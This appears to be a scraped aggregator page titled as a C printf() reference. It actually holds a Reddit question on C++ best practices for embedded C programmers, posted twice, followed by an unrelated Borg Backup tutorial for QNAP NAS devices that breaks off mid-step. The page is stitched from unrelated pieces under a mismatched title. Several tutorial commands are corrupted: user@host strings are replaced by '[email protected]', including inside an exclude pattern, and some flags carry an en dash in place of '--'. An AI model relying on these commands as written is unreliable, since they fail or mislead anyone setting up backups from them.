C library function - printf() - Tutorialspoint

Best Practices for A C Programmer

Hi all,
Long time C programmer here, primarily working in the embedded industry (particularly involving safety-critical code). I've been a lurker on this sub for a while but I'm hoping to ask some questions regarding best practices. I've been trying to start using c++ on a lot of my work - particularly taking advantage of some of the code-reuse and power of C++ (particularly constexpr, some loose template programming, stronger type checking, RAII etc).
I would consider myself maybe an 8/10 C programmer but I would conservatively maybe rate myself as 3/10 in C++ (with 1/10 meaning the absolute minmum ability to write, google syntax errata, diagnose, and debug a program). Perhaps I should preface the post that I am more than aware that C is by no means a subset of C++ and there are many language constructs permitted in one that are not in the other.
In any case, I was hoping to get a few answers regarding best practices for c++. Keep in mind that the typical target device I work with does not have a heap of any sort and so a lot of the features that constitute "modern" C++ (non-initialization use of dynamic memory, STL meta-programming, hash-maps, lambdas (as I currently understand them) are a big no-no in terms of passing safety review.

When do I overload operators inside a class as opposed to outisde?

... And what are the arguments foagainst each paradigm? See below:
/* Overload example 1 (overloaded inside class) */ class myclass { private: unsigned int a; unsigned int b; public: myclass(void); unsigned int get_a(void) const; bool operator==(const myclass &rhs); }; bool myclass::operator==(const myclass &rhs) { if (this == &rhs) { return true; } else { if (this->a == rhs.a && this->b == rhs.b) { return true; } } return false; } 
As opposed to this:
/* Overload example 2 (overloaded outside of class) */ class CD { private: unsigned int c; unsigned int d; public: CD(unsigned int _c, unsigned int _d) : d(_d), c(_c) {}; /* CTOR */ unsigned int get_c(void) const; /* trival getters */ unsigned int get_d(void) const; /* trival getters */ }; /* In this implementation, If I don't make the getters (get_c, get_d) constant, * it won't compile despite their access specifiers being public. * * It seems like the const keyword in C++ really should be interpretted as * "read-only AND no side effects" rather than just read only as in C. * But my current understanding may just be flawed... * * My confusion is as follows: The function args are constant references * so why do I have to promise that the function methods have no side-effects on * the private object members? Is this something specific to the == operator? */ bool operator==(const CD & lhs, const CD & rhs) { if(&lhs == &rhs) return true; else if((lhs.get_c() == rhs.get_c()) && (lhs.get_d() == rhs.get_d())) return true; return false; } 
When should I use the example 1 style over the example 2 style? What are the pros and cons of 1 vs 2?

What's the deal with const member functions?

This is more of a subtle confusion but it seems like in C++ the const keyword means different things base on the context in which it is used. I'm trying to develop a relatively nuanced understanding of what's happening under the hood and I most certainly have misunderstood many language features, especially because C++ has likely changed greatly in the last ~6-8 years.

When should I use enum classes versus plain old enum?

To be honest I'm not entirely certain I fully understand the implications of using enum versus enum class in C++.
This is made more confusing by the fact that there are subtle differences between the way C and C++ treat or permit various language constructs (const, enum, typedef, struct, void*, pointer aliasing, type puning, tentative declarations).
In C, enums decay to integer values at compile time. But in C++, the way I currently understand it, enums are their own type. Thus, in C, the following code would be valid, but a C++ compiler would generate a warning (or an error, haven't actually tested it)
/* Example 3: (enums : Valid in C, invalid in C++ ) */ enum COLOR { RED, BLUE, GREY }; enum PET { CAT, DOG, FROG }; /* This is compatible with a C-style enum conception but not C++ */ enum SHAPE { BALL = RED, /* In C, these work because int = int is valid */ CUBE = DOG, }; 
If my understanding is indeed the case, do enums have an implicit namespace (language construct, not the C++ keyword) as in C? As an add-on to that, in C++, you can also declare enums as a sort of inherited type (below). What am I supposed to make of this? Should I just be using it to reduce code size when possible (similar to gcc option -fuse-packed-enums)? Since most processors are word based, would it be more performant to use the processor's word type than the syntax specified above?
/* Example 4: (Purely C++ style enums, use of enum class/ enum struct) */ /* C++ permits forward enum declaration with type specified */ enum FRUIT : int; enum VEGGIE : short; enum FRUIT /* As I understand it, these are ints */ { APPLE, ORANGE, }; enum VEGGIE /* As I understand it, these are shorts */ { CARROT, TURNIP, }; 
Complicating things even further, I've also seen the following syntax:
/* What the heck is an enum class anyway? When should I use them */ enum class THING { THING1, THING2, THING3 }; /* And if classes and structs are interchangable (minus assumptions * about default access specifiers), what does that mean for * the following definition? */ enum struct FOO /* Is this even valid syntax? */ { FOO1, FOO2, FOO3 }; 
Given that enumerated types greatly improve code readability, I've been trying to wrap my head around all this. When should I be using the various language constructs? Are there any pitfalls in a given method?

When to use POD structs (a-la C style) versus a class implementation?

If I had to take a stab at answering this question, my intuition would be to use POD structs for passing aggregate types (as in function arguments) and using classes for interface abstractions / object abstractions as in the example below:
struct aggregate { unsigned int related_stuff1; unsigned int related_stuff2; char name_of_the_related_stuff[20]; }; class abstraction { private: unsigned int private_member1; unsigned int private_member2; protected: unsigned int stuff_for_child_classes; public: /* big 3 */ abstraction(void); abstraction(const abstraction &other); ~abstraction(void); /* COPY semantic ( I have a better grasp on this abstraction than MOVE) */ abstraction &operator=(const abstraction &rhs); /* MOVE semantic (subtle semantics of which I don't full grasp yet) */ abstraction &operator=(abstraction &&rhs); /* * I've seen implentations of this that use a copy + swap design pattern * but that relies on std::move and I realllllly don't get what is * happening under the hood in std::move */ abstraction &operator=(abstraction rhs); void do_some_stuff(void); /* member function */ }; 
Is there an accepted best practice for thsi or is it entirely preference? Are there arguments for only using classes? What about vtables (where byte-wise alignment such as device register overlays and I have to guarantee placement of precise members)

Is there a best practice for integrating C code?

Typically (and up to this point), I've just done the following:
/* Example 5 : Linking a C library */ /* Disable name-mangling, and then give the C++ linker / * toolchain the compiled * binaries */ #ifdef __cplusplus extern "C" { #endif /* C linkage */ #include "device_driver_header_or_a_c_library.h" #ifdef __cplusplus } #endif /* C linkage */ /* C++ code goes here */ 
As far as I know, this is the only way to prevent the C++ compiler from generating different object symbols than those in the C header file. Again, this may just be ignorance of C++ standards on my part.

What is the proper way to selectively incorporate RTTI without code size bloat?

Is there even a way? I'm relatively fluent in CMake but I guess the underlying question is if binaries that incorporate RTTI are compatible with those that dont (and the pitfalls that may ensue when mixing the two).

What about compile time string formatting?

One of my biggest gripes about C (particularly regarding string manipulation) frequently (especially on embedded targets) variadic arguments get handled at runtime. This makes string manipulation via the C standard library (printf-style format strings) uncomputable at compile time in C.
This is sadly the case even when the ranges and values of paramers and formatting outputs is entirely known beforehand. C++ template programming seems to be a big thing in "modern" C++ and I've seen a few projects on this sub that use the turing-completeness of the template system to do some crazy things at compile time. Is there a way to bypass this ABI limitation using C++ features like constexpr, templates, and lambdas? My (somewhat pessimistic) suspicion is that since the generated assembly must be ABI-compliant this isn't possible. Is there a way around this? What about the std::format stuff I've been seeing on this sub periodically?

Is there a standard practice for namespaces and when to start incorporating them?

Is it from the start? Is it when the boundaries of a module become clearly defined? Or is it just personal preference / based on project scale and modularity?
If I had to make a guess it would be at the point that you get a "build group" for a project (group of source files that should be compiled together) as that would loosely define the boundaries of a series of abstractions APIs you may provide to other parts of a project.
--EDIT-- markdown formatting
submitted by aWildElectron to cpp [link] [comments]

C++ Best Practices For a C Programmer

Hi all,
Long time C programmer here, primarily working in the embedded industry (particularly involving safety-critical code). I've been a lurker on this sub for a while but I'm hoping to ask some questions regarding best practices. I've been trying to start using c++ on a lot of my work - particularly taking advantage of some of the code-reuse and power of C++ (particularly constexpr, some loose template programming, stronger type checking, RAII etc).
I would consider myself maybe an 8/10 C programmer but I would conservatively maybe rate myself as 3/10 in C++ (with 1/10 meaning the absolute minmum ability to write, google syntax errata, diagnose, and debug a program). Perhaps I should preface the post that I am more than aware that C is by no means a subset of C++ and there are many language constructs permitted in one that are not in the other.
In any case, I was hoping to get a few answers regarding best practices for c++. Keep in mind that the typical target device I work with does not have a heap of any sort and so a lot of the features that constitute "modern" C++ (non-initialization use of dynamic memory, STL meta-programming, hash-maps, lambdas (as I currently understand them) are a big no-no in terms of passing safety review.

When do I overload operators inside a class as opposed to outisde?


... And what are the arguments foagainst each paradigm? See below:
/* Overload example 1 (overloaded inside class) */ class myclass { private: unsigned int a; unsigned int b; public: myclass(void); unsigned int get_a(void) const; bool operator==(const myclass &rhs); }; bool myclass::operator==(const myclass &rhs) { if (this == &rhs) { return true; } else { if (this->a == rhs.a && this->b == rhs.b) { return true; } } return false; } 
As opposed to this:

/* Overload example 2 (overloaded outside of class) */ class CD { private: unsigned int c; unsigned int d; public: CD(unsigned int _c, unsigned int _d) : d(_d), c(_c) {}; /* CTOR */ unsigned int get_c(void) const; /* trival getters */ unsigned int get_d(void) const; /* trival getters */ }; /* In this implementation, If I don't make the getters (get_c, get_d) constant, * it won't compile despite their access specifiers being public. * * It seems like the const keyword in C++ really should be interpretted as * "read-only AND no side effects" rather than just read only as in C. * But my current understanding may just be flawed... * * My confusion is as follows: The function args are constant references * so why do I have to promise that the function methods have no side-effects on * the private object members? Is this something specific to the == operator? */ bool operator==(const CD & lhs, const CD & rhs) { if(&lhs == &rhs) return true; else if((lhs.get_c() == rhs.get_c()) && (lhs.get_d() == rhs.get_d())) return true; return false; } 
When should I use the example 1 style over the example 2 style? What are the pros and cons of 1 vs 2?

What's the deal with const member functions?

This is more of a subtle confusion but it seems like in C++ the const keyword means different things base on the context in which it is used. I'm trying to develop a relatively nuanced understanding of what's happening under the hood and I most certainly have misunderstood many language features, especially because C++ has likely changed greatly in the last ~6-8 years.

When should I use enum classes versus plain old enum?


To be honest I'm not entirely certain I fully understand the implications of using enum versus enum class in C++.
This is made more confusing by the fact that there are subtle differences between the way C and C++ treat or permit various language constructs (const, enum, typedef, struct, void*, pointer aliasing, type puning, tentative declarations).
In C, enums decay to integer values at compile time. But in C++, the way I currently understand it, enums are their own type. Thus, in C, the following code would be valid, but a C++ compiler would generate a warning (or an error, haven't actually tested it)
/* Example 3: (enums : Valid in C, invalid in C++ ) */ enum COLOR { RED, BLUE, GREY }; enum PET { CAT, DOG, FROG }; /* This is compatible with a C-style enum conception but not C++ */ enum SHAPE { BALL = RED, /* In C, these work because int = int is valid */ CUBE = DOG, }; 
If my understanding is indeed the case, do enums have an implicit namespace (language construct, not the C++ keyword) as in C? As an add-on to that, in C++, you can also declare enums as a sort of inherited type (below). What am I supposed to make of this? Should I just be using it to reduce code size when possible (similar to gcc option -fuse-packed-enums)? Since most processors are word based, would it be more performant to use the processor's word type than the syntax specified above?
/* Example 4: (Purely C++ style enums, use of enum class/ enum struct) */ /* C++ permits forward enum declaration with type specified */ enum FRUIT : int; enum VEGGIE : short; enum FRUIT /* As I understand it, these are ints */ { APPLE, ORANGE, }; enum VEGGIE /* As I understand it, these are shorts */ { CARROT, TURNIP, }; 
Complicating things even further, I've also seen the following syntax:
/* What the heck is an enum class anyway? When should I use them */ enum class THING { THING1, THING2, THING3 }; /* And if classes and structs are interchangable (minus assumptions * about default access specifiers), what does that mean for * the following definition? */ enum struct FOO /* Is this even valid syntax? */ { FOO1, FOO2, FOO3 }; 
Given that enumerated types greatly improve code readability, I've been trying to wrap my head around all this. When should I be using the various language constructs? Are there any pitfalls in a given method?

When to use POD structs (a-la C style) versus a class implementation?


If I had to take a stab at answering this question, my intuition would be to use POD structs for passing aggregate types (as in function arguments) and using classes for interface abstractions / object abstractions as in the example below:
struct aggregate { unsigned int related_stuff1; unsigned int related_stuff2; char name_of_the_related_stuff[20]; }; class abstraction { private: unsigned int private_member1; unsigned int private_member2; protected: unsigned int stuff_for_child_classes; public: /* big 3 */ abstraction(void); abstraction(const abstraction &other); ~abstraction(void); /* COPY semantic ( I have a better grasp on this abstraction than MOVE) */ abstraction &operator=(const abstraction &rhs); /* MOVE semantic (subtle semantics of which I don't full grasp yet) */ abstraction &operator=(abstraction &&rhs); /* * I've seen implentations of this that use a copy + swap design pattern * but that relies on std::move and I realllllly don't get what is * happening under the hood in std::move */ abstraction &operator=(abstraction rhs); void do_some_stuff(void); /* member function */ }; 
Is there an accepted best practice for thsi or is it entirely preference? Are there arguments for only using classes? What about vtables (where byte-wise alignment such as device register overlays and I have to guarantee placement of precise members)

Is there a best practice for integrating C code?


Typically (and up to this point), I've just done the following:
/* Example 5 : Linking a C library */ /* Disable name-mangling, and then give the C++ linker / * toolchain the compiled * binaries */ #ifdef __cplusplus extern "C" { #endif /* C linkage */ #include "device_driver_header_or_a_c_library.h" #ifdef __cplusplus } #endif /* C linkage */ /* C++ code goes here */ 
As far as I know, this is the only way to prevent the C++ compiler from generating different object symbols than those in the C header file. Again, this may just be ignorance of C++ standards on my part.

What is the proper way to selectively incorporate RTTI without code size bloat?

Is there even a way? I'm relatively fluent in CMake but I guess the underlying question is if binaries that incorporate RTTI are compatible with those that dont (and the pitfalls that may ensue when mixing the two).

What about compile time string formatting?


One of my biggest gripes about C (particularly regarding string manipulation) frequently (especially on embedded targets) variadic arguments get handled at runtime. This makes string manipulation via the C standard library (printf-style format strings) uncomputable at compile time in C.
This is sadly the case even when the ranges and values of paramers and formatting outputs is entirely known beforehand. C++ template programming seems to be a big thing in "modern" C++ and I've seen a few projects on this sub that use the turing-completeness of the template system to do some crazy things at compile time. Is there a way to bypass this ABI limitation using C++ features like constexpr, templates, and lambdas? My (somewhat pessimistic) suspicion is that since the generated assembly must be ABI-compliant this isn't possible. Is there a way around this? What about the std::format stuff I've been seeing on this sub periodically?

Is there a standard practice for namespaces and when to start incorporating them?

Is it from the start? Is it when the boundaries of a module become clearly defined? Or is it just personal preference / based on project scale and modularity?
If I had to make a guess it would be at the point that you get a "build group" for a project (group of source files that should be compiled together) as that would loosely define the boundaries of a series of abstractions APIs you may provide to other parts of a project.
--EDIT-- markdown formatting
submitted by aWildElectron to cpp_questions [link] [comments]

Tutorial: Using Borg for backup your QNAP to other devices (Advanced - CLI only)

Tutorial: Using Borg for backup your QNAP to other devices (Advanced - CLI only)
This tutorial will explain how to use Borg Backup to perform backups. This tutorial will specifically be aimed to perform backups from our QNAP to another unit (another NAS in your LAN, external hard drive, any off-site server, etc). But it is also a great tool to backup your computers to your NAS. This tutorial is a little bit more technical than the previous, so, be patient :)
MASSIVE WALL OF TEXT AHEAD. You have been warned.
Why Borg instead of, let’s say HBS3? Well, Borg is one of the best -if not THE BEST- backup software available. It is very resilient to failure and corruption. Personally I’m in love with Borg. It is a command line based tool. That means that there is no GUI available (there are a couple of front-end created by community, though). I know that can be very intimidating at first when you are not accustomed to it, and that it looks ugly, but honestly, it is not so complicated, and if you are willing to give it a try, I can assure you that is simple and easy. You might even like it over time!
https://www.borgbackup.org/
That aside, I have found that HBS3 can only perform incremental backups when doing QNAP-QNAP backups. It can use Rsync to save files to a non-QNAP device, but then you can’t use incremental (and IIRC, neither Deduplication or encryption). It will even refuse to save to a mounted folder using hybrid mount. QNAP seems to be trying to subtle lock you down in their ecosystem. Borg has none of those limitations.

Main pros of Borg Backup:
- VERY efficient and powerful
- Space efficient thanks to deduplication and compression
- Allows encryption, deduplication, incremental, compression… you name it.
- Available in almost any OS (except Windows) and thanks to Docker, even in Windows. There are also ARM binaries, so it is Raspberry compatible, and even ARM based QNAPs that don’t support docker can use it!!!
- Since it’s available in most OS, you can use a single unified solution for all your backups.
- Can make backups in PUSH and PULL style. Either each machine with Borg pushes the files into the server, or a single server with Borg installed pulls the files from any device without needing to install Borg on those devices.
- It is backed by a huge community with tons of integration and wrapper tools (https://github.com/borgbackup/community)
- Supports Backup to local folders, LAN backups using NFS or SMB, and also remote backups using SFTP or mounting SSHFS.
- IT IS FOSS. Seriously, guys, whenever possible, choose FOSS.

Cons of Borg Backup:
- It is not tailored for backups to cloud services like Drive or Mega. You might want to take a look at Rclone or Restic for that.
- It lacks GUI, so everything is CLI controlled. I know, it can be very intimidating, but once you have used it for a couple of days, you will notice how simple and comfortable to use is.

The easiest way to run Borg is to just grab the appropriate prebuilt binary (https://github.com/borgbackup/borg/releases) and run it baremetal, but I’m going to show how to install Borg in a docker container so you can apply this solution to any other scenario where docker is available. If you want to skip the container creation, just proceed directly to step number 2.

**FIRST STEP: LET'S BUILD THE CONTAINER**
There is currently no official Borg prebuilt container (although there are non-official ones). Since it’s a CLI tool, you don’t really need a prebuilt container, you can just use your preferred one (Ubuntu, Debian, Alpine etc) and install Borg directly in your container. We are using a ubuntu:latest container because the available Borg version for ubuntu is up to date. For easiness, all those directories we want to backup will be mounted inside the container in /output.
If you already are familiar with SSH and container creation though CLI, just user this template, substituting your specific directories mount.
docker run -it \ --cap-add=NET_ADMIN \ --net=bridge \ --privileged \ --cap-add SYS_ADMIN \ --device /dev/fuse \ --security-opt apparmor:unconfined \ --name=borgbackup \ -v /share/Movies:/output/Movies:ro \ -v /share/Important/Documents:/output/Documents:ro \ -v /share/Other:/output/Other:ro \ -v /share/Containeborgbackup/persist:/persist \ -v /etc/localtime:/etc/localtime:ro \ ubuntu:latest 
(REMEMBER: LINUX IS CAPITAL SENSIBLE, SO CAPITALS MATTER!!)
Directories to be backup are mounted as read only (:ro) for extra safety. I have also found that mounting another directory as “persistent” directory makes easy to create and edit the needed scripts directly from File Finder in QNAP, and also allows to keep them in case you need to destroy or recreate the container: this is the “/persist” directory. Use your favorite path.
If you are not familiar with SSH, first go here to learn how to activate and login into your QNAP using SSH (https://www.qnap.com/en/how-to/knowledge-base/article/how-to-access-qnap-nas-by-ssh/).
You can also use the GUI in Container Station to create the container and mount folders in advanced tab during container creation. Please, refer to QNAP’s tutorials about Docker.
GUI example
If done correctly, you will see that this container appears in the overview tab of Container Station. Click the name, and then click the two arrows. That will transport you to another tab inside the container to start working.
https://preview.redd.it/5y09skuxrvj41.jpg?width=1440&format=pjpg&auto=webp&s=19e4b22d6458d2c9a8143c9841f070828bcf5170

**SECOND STEP: INSTALLING BORG BACKUP INSIDE THE CONTAINER**
First check that the directory with all the data you want to backup (/output in our example) is mounted. If you can’t see anything, then you did something wrong in the first step when creating the container. If so, delete the container and try again. Now navigate to /persist using “cd /persist”
See how /output contains to-be-backup directories
Now, we are going to update ubuntu and install some dependencies and apps we need to work. Copy and paste this:
apt update && apt upgrade -y apt install -y nano fuse software-properties-common nfs-common ssh 
It will install a lot of things. Just let it work. When finished, install borgbackup using
add-apt-repository -y ppa:costamagnagianfranco/borgbackup apt install -y borgbackup 
When it’s finished, run “borg --version” and you will be shown the current installed version (at time of writing this current latest is 1.1.10). You already have Borg installed!!!!
1.1.10 is latest version at the time of this tutorial creation

**THIRD STEP: PREPARING THE BACKUP DEVICE USING NFS MOUNT**
Now, to init the repository, we first need to choose where we want to make the backup. Borg can easily make “local” backups, choosing a local folder, but that defeats the purpose for backups, right? We want to create remote repositories.
If you are making backups to a local (same network) device (another NAS, a computer, etc) then you can choose to use SFTP (SSH file transfer) or just NFS or SMB to mount a folder. If you want to backup to a remote repository outside your LAN (the internet) you HAVE to use SFTP or SSHFS. I’m explaining now how to mount folder using NFS, leaving SFTP for later.
Borg can work in two different ways: PUSH style or PULL style.
In PUSH style, each unit to be backup have Borg installed and it “pushes” the files to a remote folder using NFS, SMB or SSHFS. The target unit do not need to have Borg installed.
PUSH style backup: The QNAP sends files to the backup device

In PULL style, the target unit that is going to receive the backups has Borg installed, and it “pulls” the files from the units to be backup (and so, they don’t need Borg installed) using NFS, SMB or SSHFS. This is great if you have a powerful NAS unit and want to backup several computers.
PULL style backup: The backup device gets files from QNAP. Useful for multiple unit backups into the same backup server.

When using SFTP, the backup unit has Borg installed, opens a secure SSH connection to target unit, connects with Borg in target machine, and uploads the files. In SFTP style, BOTH units need Borg installed.
SFTP: Borg needs to be installed in both devices, and they \"talk\" each other.

I’m assuming you have another device with IP “192.168.1.200” (in my example I’m using a VM with that IP) with a folder called “/backup” inside. I’m also assuming that you have correctly authorized NFS mount with read/write permissions between both devices. If you don’t now how to, you’ll need to investigate. (https://www.qnap.com/en-us/how-to/knowledge-base/article/how-to-enable-and-setup-host-access-for-nfs-connection/)
NFS mount means mirroring two folders from two different devices. So, mounting folder B from device Y into folder A from device X means that even if the folder B is “physically” stored on device Y, the device X can use it exactly as if it was folder A inside his local path. If you write something to folder A, folder B will automatically be updated with that new file and vice-versa.
Graphical example of what happens when mounting folders in Linux system.
Mount usage is: “mount [protocol] [targetIP]:/target/directory /local/directory” So, go to your container and write:
mount -t nfs 192.168.1.200:/backup /mnt 
Mount is the command to mount. “-t nfs” means using NFS, if you want to use SMB you would use “-t cifs”. 192.168.1.200 is the IP of the device where you are going to make backups. /backup is the directory in the target we want to save our backups to (remember you need to correctly enable permission for NFS server sharing in the target device). /mnt is the directory in the container where the /backup folder will be mounted.
OK, so now /mnt in container = /backup in target. If you drop a .txt file in one of those directories, it will immediately appear on the other. So… All we have to do now is make a borg repository on /mnt and wildly start making backups. /mnt will be our working directory.

**FOURTH STEP: ACTUALLY USING BORG** (congrats if you made it here)
Read the documentation
https://borgbackup.readthedocs.io/en/stable/usage/general.html
It’s madness. Right?. It’s OK. In fact we only need a very few borg commands to make it work.
“borg init” creates a repository, that is, a place where the backup files are stored.
“borg create” makes a backup
“borg check” checks backup integrity
“borg prune” prunes the backup (deletes older files)
“borg extract” extract files from a backup
“borg mount” mounts a backup as if it was a directory and you can navigate it
“borg info” gives you info from the repository
“borg list” shows every backup inside the repository
But since we are later using pre-made scripts for backup, you will only need to actually use “init”, “info” and “list” and in case of recovery, “mount”.
let’s create our repository using INIT
https://borgbackup.readthedocs.io/en/stable/usage/init.html
borg init -e [encryption] [options] /mnt 
So, if you want to encrypt the repository with a password (highly recommended) use “-e repokey” or “-e repokey-blake2”. If you want to use a keyfile instead, use “-e keyfile”. If you don’t want to encrypt, use “-e none”. If you want to set a maximum space quota, use “--storage-quota ” to avoid excessive storage usage (I.e “--storage-quota 500G” or “--storage-quota 2.5T”). Read the link above. OK, so in this example:
borg init -e repokey –storage-quota 200G /mnt 
You will be asked for a password. Keep this password safe. If you lose it, you lose your backups!!!! Once finished, we have our repository ready to create the first backup. If you use “ls /mnt” you will see than the /mnt directory is no longer empty, but contains several files. Those are the repository files, and now should also be present in your backup device.
init performed successfully
Let’s talk about actually creating backups. Usually, you would create a backup using the “borg create” backup command, using something like this:
borg create -l -s /mnt::Backup01 /output --exclude ‘*.py’ 
https://borgbackup.readthedocs.io/en/stable/usage/create.html
That would create a backup archive called “backup01” of all files and directories in /output, but excluding every .py file. It will also verbose all files (-l) and stats (-s) during the process. If you later write the same but with “Backup02”, only new added files will be saved (incremental) but deleted files will still be available in “Backup01”. So as new backups are made, you will end running out of storage space. To avoid this you would need to schedule pruning.
https://borgbackup.readthedocs.io/en/stable/usage/prune.html
borg prune [options] [path/to/repo] is used to delete old backups based on your specified options (I.e “save 4 last year backups, 1 backups each month last year, and 1 daily last month).
BUT. To make is simple, we just need to create a script that will automatically 1) Create a new backup with specified name and 2) run a Prune with specified retention policy.
Inside the container head to /persist using “cd /persist”, and create a file called backup.sh using
touch backup.sh chmod 700 backup.sh nano backup.sh 
Then, copy the following and paste it inside nano using CTRL+V
#!/bin/sh # Setting this, so the repo does not need to be given on the command line: export BORG_REPO=/mnt # Setting this, so you won't be asked for your repository passphrase: export BORG_PASSPHRASE='YOURsecurePASS' # or this to ask an external program to supply the passphrase: # export BORG_PASSCOMMAND='pass show backup' # some helpers and error handling: info() { printf "\n%s %s\n\n" "$( date )" "$*" >&2; } trap 'echo $( date ) Backup interrupted >&2; exit 2' INT TERM info "Starting backup" # Backup the most important directories into an archive named after # the machine this script is currently running on: borg create \ --verbose \ --filter AME \ --list \ --stats \ --show-rc \ --compression lz4 \ --exclude-caches \ --exclude '*@Recycle/*' \ --exclude '*@Recently-Snapshot/*' \ --exclude '*[email protected]__thumb/*' \ \ ::'QNAP-{now}' \ /output \ backup_exit=$? info "Pruning repository" # Use the `prune` subcommand to maintain 7 daily, 4 weekly and 6 monthly # archives of THIS machine. The 'QNAP-' prefix is very important to # limit prune's operation to this machine's archives and not apply to # other machines' archives also: borg prune \ --list \ --prefix 'QNAP-' \ --show-rc \ --keep-daily 7 \ --keep-weekly 4 \ --keep-monthly 6 \ prune_exit=$? # use highest exit code as global exit code global_exit=$(( backup_exit > prune_exit ? backup_exit : prune_exit )) if [ ${global_exit} -eq 0 ]; then info "Backup and Prune finished successfully" elif [ ${global_exit} -eq 1 ]; then info "Backup and/or Prune finished with warnings" else info "Backup and/or Prune finished with errors" fi exit ${global_exit} 
This script seems very complicated, but all it does is
  1. Define the backup location
  2. Define backup parameters, inclusions and exclusions and run backup
  3. Define pruning policy and run prune
  4. Show stats
You can freely modify it using the options you need (they are described in the documentation).
“export BORG_REPO=/mnt” is where the repository is located.
“export BORG_PASSPHRASE='YOURsecurePASS' is your repository password (between the single quotes)
After “borg create” some options are defined, like compression, file listing and stat showing. Then exclusion are defined (each –exclude defines one exclusion rules. In this example I have defined rules to avoid backup thumbnails, recycle bin files, and snapshots). If you wish to exclude mode directories or files, you do it adding a new rule there.
::'QNAP-{now}' defines how backups will be named. Right now they will be named as QNAP-”current date and time”. In case you want only current date and not time used, you can use instead:
::'QNAP-{now:%Y-%m-%d}' \
Be aware that if you decide to do so, you will only be able to create a single backup each day, as subsequent backups the same day will fail, since Borg will find another backup with same name and skip the current one.
/output below is the directory to be backup.
And finally, prune policy is at the end. This defines what backups will be kept and which ones will be deleted. Current defined policy is to keep 7 end of day, then 4 end of week and 6 end of month backups. Extra backups will be deleted. You can modify this depending on your needs. Follow the documentation for extra information and examples.
https://borgbackup.readthedocs.io/en/stable/usage/prune.html
Now save the script using CTRL+O. We are ready. Run the script using:
./backup.sh
It will show progress, including what files are being saved. After finishing, it will return backup name (in this example “QNAP-2020-01-26T01:05:36“ is the name of the backup archive), stats and will return two rc status, one for the backup, and another for pruning. “rc0” means success. “rc1” means finished, but with some errors. “rc2” means failed. You should be returned two rc0 status and the phrase “Backup and Prune finished successfully”. Congrats.
Backup completed. rc 0=good. rc 2=bad
You can use any borg command manually against your repository as needed. For example:
borg list /mnt List your current backups inside the repository borg list /mnt::QNAP-2020-01-26T01:05:36 List all archives inside this specific backup borg info /mnt List general stats of your repository borg check -v –show-rc /mnt Performs an integrity check and returns rc status (0, 1 or 2) 
All that is left is to create the final running script and the cronjob in our QNAP to automate backups. You can skip the next step, as it describes the same process but using SFTP instead of NFS, and head directly to step number Six.

**FIFTH STEP: HTE SAME AS STEP 4, BUT USING SFTP INSTEAD**
If you want to perform backups to an off-site machine, like another NAS located elsewhere, then you can’t use NFS or SMB, as they are not prepared to be used through internet and are not safe. We must use SFTP. SFTP is NOT FTP over SSL (that is FTPS). SFTP stands for Secure File Transfer Protocol, and it’s based on SSH but for file transfer. It is secure, as everything is encrypted, but expect lower speed due encryption overhead. We need to first set it up SSH on our target machine, so be sure to enable it. I also recommend to use a non standard port. In our example, we are using port 4000.
IMPORTANT NOTE: To use SFTP, borg backup must be running in the target machine. You can run it baremetal, or use a container, just as in our QNAP, but if you really can’t get borg running in the target machine, then you cannot use SFTP. There is an alternative, though: SSHFS, which is basically NFS but over SSH. With it you can securely mount a folder over internet. Read this documentation (https://www.digitalocean.com/community/tutorials/how-to-use-sshfs-to-mount-remote-file-systems-over-ssh) and go back to Third Step once you got it working. SSHFS is not covered in this tutorial.
First go to your target machine, and create a new user (in our example this will be “targetuser”)
Second we need to create SSH keys, so both the original machine and the target one can perform SSH connection without needing for a password. It also greatly increases security. In our original container run
ssh-keygen -t rsa 
When you are asked for a passphrase just press enter (no passphrase). Your keys are now stored in ~/.ssh To copy them to your target machine, use this:
ssh-copy-id -p 4000 [email protected] 
If that don’t work, this is an alternative command you can use:
cat ~/.ssh/id_rsa.pub | ssh -p 4000 [email protected] "mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat >> ~/.ssh/authorized_keys" 
You will be asked for targetuser password when connecting. If you were successful, you can now SSH without password in the target machine using “ssh -p 4000 [email protected]”. Try it now. If you get to login without password prompt, you got it right. If it still asks you for password when SSH’ing, try repeating the last step or google a little about how to transfer the SSH keys to the target machine.
Now that you are logged in your target machine using SSH, install Borg backup if you didn’t previously, create the backup folder (/backup in our example) and init the repository as was shown in Third Step.
borg init -e repokey –storage-quota 200G /backup 
Once the repository is initiated, you can exit SSH using “exit” command. And you will be back in your container. You know what comes next.
cd /persist touch backup.sh chmod 700 backup.sh nano backup.sh 
Now paste this inside:
#!/bin/sh # Setting this, so the repo does not need to be given on the command line: export BORG_REPO=ssh://[email protected]:4000/backup # Setting this, so you won't be asked for your repository passphrase: export BORG_PASSPHRASE='YOURsecurePASS' # or this to ask an external program to supply the passphrase: # export BORG_PASSCOMMAND='pass show backup' # some helpers and error handling: info() { printf "\n%s %s\n\n" "$( date )" "$*" >&2; } trap 'echo $( date ) Backup interrupted >&2; exit 2' INT TERM info "Starting backup" # Backup the most important directories into an archive named after # the machine this script is currently running on: borg create \ --verbose \ --filter AME \ --list \ --stats \ --show-rc \ --compression lz4 \ --exclude-caches \ --exclude '*@Recycle/*' \ --exclude '*@Recently-Snapshot/*' \ --exclude '*[email protected]__thumb/*' \ \ ::'QNAP-{now}' \ /output \ backup_exit=$? info "Pruning repository" # Use the `prune` subcommand to maintain 7 daily, 4 weekly and 6 monthly # archives of THIS machine. The 'QNAP-' prefix is very important to # limit prune's operation to this machine's archives and not apply to # other machines' archives also: borg prune \ --list \ --prefix 'QNAP-' \ --show-rc \ --keep-daily 7 \ --keep-weekly 4 \ --keep-monthly 6 \ prune_exit=$? # use highest exit code as global exit code global_exit=$(( backup_exit > prune_exit ? backup_exit : prune_exit )) if [ ${global_exit} -eq 0 ]; then info "Backup and Prune finished successfully" elif [ ${global_exit} -eq 1 ]; then info "Backup and/or Prune finished with warnings" else info "Backup and/or Prune finished with errors" fi exit ${global_exit} 
CTRL+O to save, and CTRL+X to exit. OK, let’s do it.
./backup.sh 
It should correctly connect and perform your backup. Note that the only thing I modified from the script shown in Fourth Step is the “BORG_REPO” line, which I substituted from local “/mnt” to remote SSH with our target machine and user data.
Finally all that is left is to automate this.

**SIXTH STEP: AUTOMATING BACKUP**
The only problem is that containers can’t retain mount when they reboot. That is not problem if you are using SFTP, but in case of NFS, we need to re-mount each time the container is started, and fstab does not work in container. The easiest solution is create a script called “start.sh”
cd /persist mkdir log touch start.sh chmod 700 start.sh nano start.sh 
and inside just paste this:
